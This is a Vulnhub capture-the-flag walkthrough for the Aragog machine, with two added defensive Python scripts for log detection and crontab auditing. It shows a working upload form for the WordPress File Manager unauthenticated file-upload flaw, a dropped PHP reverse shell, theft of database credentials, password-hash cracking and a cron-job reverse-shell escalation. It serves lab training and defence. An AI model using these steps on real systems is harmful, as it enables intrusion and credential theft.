HARRYPOTTER: ARAGOG | Vulnhub Walkthrough

Rahul
5 min read · May 6, 2021


Let’s do another cool Vulnhub machine from @Mansoor R.

Aragog is the first VM of the three-box HarryPotter series.

Goal: find the 2 horcruxes hidden inside the machine.

Lab Setup:

Download this machine from the link and import it into VirtualBox.

Let’s start with reconnaissance.

Here is the machine’s welcome message and its IP.

In my case the IP is 192.168.1.101.

Let’s start a quick scan.

┌──(root💀kali)-[~/vm/arogya]
└─# nmap 192.168.1.101
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-06 10:16 IST
Nmap scan report for 192.168.1.101
Host is up (0.00061s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

MAC Address: 08:00:27:57:94:99 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.66 seconds

The quick scan shows two open ports: 22 (SSH) and 80 (HTTP).

Here is the complete Nmap scan report (all ports, service detection and default scripts):

┌──(root💀kali)-[~/vm/arogya]
└─# nmap -sV -sC -A -vv -p- -oA 192.168.1.101 192.168.1.101
# Nmap 7.91 scan initiated Wed May 5 14:50:04 2021 as: nmap -sV -sC -A -vv -p- -oA 192.168.1.101 192.168.1.101
Nmap scan report for 192.168.1.101
Host is up, received arp-response (0.00073s latency).
Scanned at 2021-05-05 14:50:05 IST for 10s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 48:df:48:37:25:94:c4:74:6b:2c:62:73:bf:b4:9f:a9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDSJJ1ZAbIA3lP2RbpxnhknzLJqrHne4be3xTLmVEXWg7YQ6FFZ/RA1VzmrFYPlvB1t1XwopptI+nA9BSG5+hllLyCQ1pDZkhIwyGHuBLZETD8cIJTlsxVCwnh67h7eeK4hTEtjp1rUodK30juDf5u7JnkwVfo78LvM8WV1LjVrmhsZiqzy1CxAoMFpiRp3ZlvpblL3gdd0wgSNrGqEwc6qJc6Z+RKGkLbnpgTnOsc6vGLs1xFOGrHF2qFeDpUWti0ZDSN31LtP1HtNItbBKSECcFD3KrN8nPaZCa2V9GA1jrpOOAF1j0ehcRlBoFqLZzQbO9RFeIkgqGNrz3PDt7vp
| 256 1e:34:18:17:5e:17:95:8f:70:2f:80:a6:d5:b4:17:3e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBESZsj5u/F88CLIXTeBD8OgiCM2u8sKBgbvvjKccwFmCBMh3GmOHGP8qzzQwVTMkq1aN0WSIk7h8/cHCT2tZLzE=
| 256 3e:79:5f:55:55:3b:12:75:96:b4:3e:e3:83:7a:54:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMsH4OtBIy/He42Rc6KvtI6w2855JMLVloVFy5/0Rtj4
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:57:94:99 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=5/5%OT=22%CT=1%CU=37181%PV=Y%DS=1%DC=D%G=Y%M=080027%TM
OS:=6092634F%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S

On port 80 there is only a Harry Potter image.

So I ran gobuster for directory brute-forcing and found one directory, /blog.

WordPress is running under /blog.

So I moved on to scanning WordPress.

┌──(root💀kali)-[~/vm/arogya]
└─# wpscan --url http://192.168.1.101/blog/ --enumerate ap --plugins-detection aggressive --plugins-version-detection aggressive

wpscan found only 2 plugins, one of which is a default plugin, so I looked at the other one.

And this is what I found.

The plugin is vulnerable: File Manager 6.0–6.9, Unauthenticated Arbitrary File Upload leading to RCE.

https://www.exploit-db.com/exploits/49178

https://wpscan.com/vulnerability/10389

So I created a simple HTML page with an upload form and submitted a payload through it.

<html><body>
<form method="POST" enctype="multipart/form-data" action="http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php">
  <input type="hidden" name="cmd" value="upload"/>
  <input type="hidden" name="target" value="l1_Lw"/>
  <input type="file" name="upload[]"/><br/><br/>
  <input type="submit" value="Upload"/>
</form>
</body></html>

The uploaded file lands at /blog/wp-content/plugins/wp-file-manager/lib/php/../files/php-reverse-shell.php

Requesting that file in the browser gave me a reverse shell.
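From the defender’s side, the two things that stand out in the web server log for this attack are a bare request to the plugin’s connector.minimal.php endpoint (normally only the plugin’s own admin page calls it) and a PHP file being served from the plugin’s lib/files upload directory. The following detector is an added example written for this walkthrough, not code from the original post or from the plugin: it parses constructed Apache combined-format log lines (the IPs, timestamps and user agents are made up) and flags both indicators. It normalises dot-dot segments first, because Apache logs the request line exactly as sent, so the lib/php/../files/ form used above would otherwise slip past a naive path match.

```python
import posixpath
import re
from typing import Dict, List, Optional

# Constructed sample lines in Apache "combined" log format; not taken from the
# original post, and the IPs/timestamps/user agents are made up for the example.
SAMPLE_LOG = """\
10.0.0.5 - - [06/May/2021:10:20:01 +0530] "GET /blog/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.9 - - [06/May/2021:10:21:14 +0530] "POST /blog/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 312 "-" "python-requests/2.25"
10.0.0.9 - - [06/May/2021:10:21:20 +0530] "GET /blog/wp-content/plugins/wp-file-manager/lib/php/../files/php-reverse-shell.php HTTP/1.1" 200 0 "-" "python-requests/2.25"
10.0.0.5 - - [06/May/2021:10:22:00 +0530] "GET /blog/wp-admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Minimal parser for the combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3})'
)

# The elFinder connector the walkthrough abuses; it should only be reached from
# the plugin's own admin page, never by a bare request straight from a client.
CONNECTOR_SUFFIX = "/wp-file-manager/lib/php/connector.minimal.php"
# Any PHP file under the plugin's upload directory is a strong web-shell indicator.
UPLOAD_PHP_RE = re.compile(r"/wp-file-manager/lib/files/.*\.php$", re.IGNORECASE)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    fields = m.groupdict()
    # Apache logs the request line as sent, so "lib/php/../files/x.php" appears
    # verbatim; normalise it so dot-dot segments cannot dodge the path match.
    raw_path = fields["path"].split("?", 1)[0]
    fields["path"] = posixpath.normpath(raw_path)
    return fields


def detect(log_text: str) -> List[Dict[str, str]]:
    """Scan log text and return one finding per suspicious request, in log order."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["path"].endswith(CONNECTOR_SUFFIX):
            rule = "direct-connector-request"
        elif UPLOAD_PHP_RE.search(rec["path"]):
            rule = "php-served-from-upload-dir"
        else:
            continue
        findings.append({"rule": rule, "ip": rec["ip"], "ts": rec["ts"],
                         "method": rec["method"], "path": rec["path"],
                         "status": rec["status"]})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['rule']}: {f['method']} {f['path']} -> {f['status']}")
```

Run it against a real access.log by passing the file contents to detect(); a 200 response on the upload-directory rule means the dropped file executed, which is the point at which the host should be treated as compromised rather than merely probed.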

The next step is to check the users.

I found 2 user entries in /etc/passwd:

gi**y:x:1001:1001::/home/XXXX:/bin/sh
ha****98:x:1000:1000:XXXX,,,:/home/XXXX:/bin/bash

Because WordPress is running, I went looking for the database credentials.

After enumerating, I found the WordPress configuration file with the database credentials:

<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'my******ss');
define('DB_HOST', 'localhost');
define('DB_COLLATE', 'utf8_general_ci');
define('WP_CONTENT_DIR', '/xxxxx/xxxxx/xxxx/xxxx');
?>

In the database I found one password hash:

hagrid98:$P$BY**************JDHtc.

So I used hashcat to crack the hash (mode 400 is phpass, the portable hash format WordPress uses, recognisable by the $P$ prefix):

┌──(root💀kali)-[~/vm/arogya]
└─# hashcat -O -a 0 -m 400 hash /usr/share/wordlists/rockyou.txt -o result.txt

This gave me the password of ha****98.

Got the first flag, which is base64 encoded.

horcrux_{RiXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXets}

Privilege escalation is a little bit tricky.

After searching around and finding nothing, I moved on to monitoring the running cron jobs.

I used pspy to monitor the running cron jobs.

After watching the commands for a while, something interesting showed up, so I paid attention to it.

So I added a reverse shell command to it and started a listener on the other side.

Once the cron job executes the file, we get a shell.
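The weakness behind this escalation is a scheduled job running as root whose command file can be modified by a less privileged user. As an added example (not code from the original post, and the crontab and paths below are constructed, not taken from the Aragog machine), here is an audit that parses system-crontab lines, resolves every absolute path in each command, and flags files that are owned by neither root nor the job’s user, are group- or world-writable, or do not exist at all. The filesystem and user lookups are injected so the example runs offline; on a real host pass the live_stat and live_uid helpers instead.

```python
import os
import re
import shlex
from typing import Callable, Dict, List

# Constructed sample system crontab (made up for this example; not the
# crontab from the Aragog machine).
SAMPLE_CRONTAB = """\
# m h dom mon dow   user      command
*/2 *  * * *        root      /opt/maintenance/rotate.sh
0   3  * * *        root      /usr/bin/apt-get clean
@reboot             root      /usr/local/bin/start-agent --quiet
*/10 * * * *        root      /home/dev/cleanup.sh
*/5 *  * * *        www-data  /usr/bin/php /var/www/html/blog/wp-cron.php
"""

# Constructed ownership and mode bits for the paths above, so the example runs
# without touching the real filesystem.
SAMPLE_FS: Dict[str, Dict[str, int]] = {
    "/opt/maintenance/rotate.sh":     {"uid": 1000, "mode": 0o755},  # root runs a user-owned script
    "/usr/bin/apt-get":               {"uid": 0,    "mode": 0o755},
    "/usr/local/bin/start-agent":     {"uid": 0,    "mode": 0o777},  # root-owned but world-writable
    "/usr/bin/php":                   {"uid": 0,    "mode": 0o755},
    "/var/www/html/blog/wp-cron.php": {"uid": 33,   "mode": 0o644},  # www-data's own job, fine
    # /home/dev/cleanup.sh is deliberately absent: referenced by cron but missing
}
SAMPLE_UIDS = {"root": 0, "www-data": 33}

# System crontab line: five schedule fields (or an @keyword), the user, then the command.
CRON_LINE_RE = re.compile(r"^(?:@\w+|(?:\S+\s+){5})\s*(?P<user>\S+)\s+(?P<cmd>.+?)\s*$")


def fake_stat(path: str) -> Dict[str, int]:
    """Stat against the constructed table; returns the same shape as live_stat."""
    if path not in SAMPLE_FS:
        raise FileNotFoundError(path)
    return SAMPLE_FS[path]


def live_stat(path: str) -> Dict[str, int]:
    """Real filesystem lookup (owner uid and permission bits only)."""
    st = os.stat(path)
    return {"uid": st.st_uid, "mode": st.st_mode & 0o7777}


def live_uid(user: str) -> int:
    import pwd  # Unix only; imported here so the offline run needs no passwd database
    return pwd.getpwnam(user).pw_uid


def audit_crontab(text: str,
                  stat_fn: Callable[[str], Dict[str, int]] = live_stat,
                  uid_fn: Callable[[str], int] = live_uid) -> List[Dict[str, str]]:
    """Flag cron jobs whose command files could be changed by someone other than the job user."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_LINE_RE.match(line)
        if not m:
            continue
        user, cmd = m.group("user"), m.group("cmd")
        job_uid = uid_fn(user)
        # Every absolute path in the command is a file the job will execute or load.
        for path in (tok for tok in shlex.split(cmd) if tok.startswith("/")):
            try:
                info = stat_fn(path)
            except FileNotFoundError:
                findings.append({"user": user, "path": path, "reason": "referenced file does not exist"})
                continue
            reasons = []
            if info["uid"] not in (0, job_uid):
                reasons.append(f"owned by uid {info['uid']}, not root or the job user")
            if info["mode"] & 0o002:
                reasons.append("world-writable")
            elif info["mode"] & 0o020:
                reasons.append("group-writable")
            for reason in reasons:
                findings.append({"user": user, "path": path, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB, stat_fn=fake_stat, uid_fn=SAMPLE_UIDS.__getitem__):
        print(f"[{f['user']}] {f['path']}: {f['reason']}")
```

On a live Debian host the same function can be pointed at the contents of /etc/crontab and the files in /etc/cron.d with the default helpers; the missing-file case is worth keeping, because a root job that calls a non-existent script in a directory a user can write to is the same escalation in waiting.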

Now I got the second flag, again base64 encoded.

horcrux_{maXXXXXXXXXXXXXXXXXXXXXXXXXXXXXOre}

Hurray !!!

Everything else is fine, but the privilege escalation part is a little bit challenging.

All you need to do is keep focusing on the running services and monitor each of them.
